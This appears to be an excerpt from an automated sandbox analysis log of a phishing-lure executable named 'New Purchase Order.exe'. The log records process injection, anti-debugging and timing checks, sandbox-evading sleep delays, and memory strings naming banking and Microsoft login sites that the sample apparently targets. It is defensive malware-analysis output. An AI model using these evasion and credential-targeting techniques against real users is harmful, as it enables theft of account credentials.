            Source: Yara match | File source: Process Memory Space: hbaiQWstL.exe PID: 2308, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\setupugc.exe | API/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\setupugc.exe | API/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\setupugc.exe | API/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\setupugc.exe | API/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\setupugc.exe | API/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\setupugc.exe | API/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\setupugc.exe | API/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\setupugc.exe | API/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Memory allocated: 13A0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Memory allocated: 2E70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Memory allocated: 13A0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Memory allocated: 8190000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Memory allocated: 9190000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Memory allocated: 9350000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Memory allocated: A350000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Memory allocated: 1850000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Memory allocated: 34A0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Memory allocated: 1870000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Memory allocated: 7C80000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Memory allocated: 8C80000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Memory allocated: 8E10000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Memory allocated: 9E10000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0181096E rdtsc 9_2_0181096E
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3841
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4892
            Source: C:\Windows\SysWOW64\setupugc.exe | Window / User API: threadDelayed 2313
            Source: C:\Windows\SysWOW64\setupugc.exe | Window / User API: threadDelayed 7660
            Source: C:\Users\user\Desktop\New Purchase Order.exe | API coverage: 0.7 %
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | API coverage: 0.2 %
            Source: C:\Windows\SysWOW64\setupugc.exe | API coverage: 2.6 %
            Source: C:\Users\user\Desktop\New Purchase Order.exe TID: 6336 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5344 | Thread sleep count: 3841 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5804 | Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5344 | Thread sleep count: 107 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2268 | Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4788 | Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4620 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe TID: 3136 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 2800 | Thread sleep count: 2313 > 30
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 2800 | Thread sleep time: -4626000s >= -30000s
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 2800 | Thread sleep count: 7660 > 30
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 2800 | Thread sleep time: -15320000s >= -30000s
            Source: C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe TID: 5952 | Thread sleep time: -40000s >= -30000s
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\setupugc.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\setupugc.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\setupugc.exe | Code function: 17_2_00CFC520 FindFirstFileW,FindNextFileW,FindClose,17_2_00CFC520
Source: 3h8t0-08.17.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 3h8t0-08.17.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 3h8t0-08.17.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 3h8t0-08.17.dr | Binary or memory string: discord.comVMware20,11696487552f
Source: 3h8t0-08.17.dr | Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 3h8t0-08.17.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 3h8t0-08.17.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 3h8t0-08.17.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 3h8t0-08.17.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 3h8t0-08.17.dr | Binary or memory string: global block list test formVMware20,11696487552
Source: 3h8t0-08.17.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 3h8t0-08.17.dr | Binary or memory string: AMC password management pageVMware20,11696487552
Source: setupugc.exe, 00000011.00000002.3376763818.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2690741859.0000027DB97DD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 3h8t0-08.17.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 3h8t0-08.17.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 3h8t0-08.17.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 3h8t0-08.17.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: SguBfrlSDIFxPr.exe, 00000014.00000002.3377666225.00000000009DF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: 3h8t0-08.17.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 3h8t0-08.17.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 3h8t0-08.17.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 3h8t0-08.17.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 3h8t0-08.17.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 3h8t0-08.17.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 3h8t0-08.17.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 3h8t0-08.17.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 3h8t0-08.17.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 3h8t0-08.17.dr | Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 3h8t0-08.17.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 3h8t0-08.17.dr | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 3h8t0-08.17.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 3h8t0-08.17.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 3h8t0-08.17.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\New Purchase Order.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\New Purchase Order.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\hbaiQWstL.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\setupugc.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0181096E rdtsc
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_00417733 LdrLoadDll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0188C188 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0188C188 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01810185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01874180 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01874180 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0185019F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0185019F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0185019F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0185019F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D6154 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D6154 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017CC156 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018961C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018961C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0184E1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0184E1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0184E1D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0184E1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0184E1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018A61E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018001F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187E10E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187E10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187E10E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187E10E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187E10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187E10E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187E10E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187E10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187E10E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187E10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01890115 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187A118 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187A118 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187A118 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187A118 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01800124 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01864144 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01864144 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01864144 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01864144 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01864144 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01868158 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017CA197 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017CA197 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017CA197 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018A4164 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018A4164 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017FC073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D2050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018680A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018960B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018960B8 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018520DE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017CA020 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017CC020 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018560E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017EE016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017EE016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017EE016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017EE016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018120F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01854000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01872000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01872000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01872000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01872000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01872000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01872000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01872000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01872000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017CC0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D80E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017CA0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01866030 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01856050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017C80A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D208A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0188C3CD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018563C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018743D4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018743D4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187E3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187E3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187E3DB mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187E3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017CC310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017F0310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018063FF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0180A30B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0180A30B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0180A30B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017EE3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017EE3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017EE3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E03E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E03E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E03E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E03E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E03E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E03E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E03E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017E03E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018A8324 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018A8324 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018A8324 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018A8324 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017DA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017DA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017DA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017DA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017DA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017DA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D83C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D83C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D83C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D83C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018A634F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01852349 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01878350 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0185035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0185035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0185035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0185035C mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0185035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0185035C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0189A352 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017C8397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017C8397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017C8397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017F438F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017F438F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017CE388 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017CE388 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017CE388 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0187437C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0180E284 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0180E284 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01850283 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01850283 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01850283 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017C826B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D4260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D4260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D4260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017D6259 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018662A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018662A0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018662A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018662A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018662A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018662A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_017CA250 mov eax, dword ptr fs:[00000030h]
